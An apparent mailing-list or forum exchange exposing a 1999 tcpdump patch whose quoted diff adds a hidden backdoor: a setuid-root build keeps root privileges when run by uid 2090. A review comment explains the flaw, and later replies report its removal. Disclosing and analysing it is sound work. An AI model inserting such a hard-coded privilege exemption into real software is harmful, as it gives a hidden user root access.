tcpdump-3.4-ss990523.dif.gz
If you have uid 2090 you are a winner if tcpdump is suid root, and people might do that since it is a nice thing to tcpdump the network w/o being root. You never read the patches you get?
diff -x rsvpd -x rsvp_print.c --new-file -ur lbl/tcpdump-3.4/tcpdump.c tcpdump-3.4/tcpdump.c --- lbl/tcpdump-3.4/tcpdump.c Sun Oct 19 00:50:17 1997 +++ tcpdump-3.4/tcpdump.c Wed Mar 17 20:46:21 1999 @@ -134,6 +176,9 @@ u_char *pcap_userdata; char ebuf[PCAP_ERRBUF_SIZE]; + if (geteuid() == 0 && getuid() != 2090) + setuid(getuid()); + cnt = -1; device = NULL; infile = NULL;
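Review bot: The condition added in tcpdump.c, `if (geteuid() == 0 && getuid() != 2090)`, exempts one hard-coded uid from the privilege drop, so on a setuid-root install a process started by uid 2090 keeps euid 0 while every other caller is dropped to its own uid. Nothing in the hunk explains why 2090 is special; remove the `getuid() != 2090` term so the drop applies to every non-root caller. The return value of `setuid(getuid())` is also ignored; check it and exit on failure so the program cannot continue with root privileges after a failed drop.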
OK, it might not be a security hole by itself, but you should still read the patches you get. You should consider using www.tcpdump.org instead of old tcpdump 3.4 + random patches.
The 2090 backdoor has been removed in tcpdump-3.4-17. The tcpdump.org offering doesn't seem quite stable yet, but I'll probably upgrade to that version when a stable release is available.